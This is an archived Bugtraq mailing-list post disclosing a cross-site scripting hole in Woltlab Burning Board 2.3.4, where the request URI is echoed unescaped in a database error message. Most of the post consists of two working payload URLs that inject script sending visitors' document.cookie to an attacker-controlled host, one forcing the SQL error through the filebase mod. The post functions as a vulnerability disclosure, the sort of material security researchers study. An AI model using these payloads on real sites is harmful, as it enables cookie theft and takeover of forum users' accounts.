Bugtraq mailing list archives

Xss in Wbb 2.3.4


From: r57shell () gmail com
Date: 18 Mar 2006 14:35:02 -0000

hi again friends
i discovered a xss in wbb again ;)
in
wbb/acp/lib/class_db_mysql.php

in the 123.line

$errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."\n<br>";

hmm what can we do with that?
if there is an sql db error you may do 

/wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>

or you may use filebase mod for make an sql error

like that 

http://www.wbbsite.com/filebase_redirect.php?fid=&apos;<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>

WwW.SpyMasterSnake.org 
Tontonq ;)


Current thread: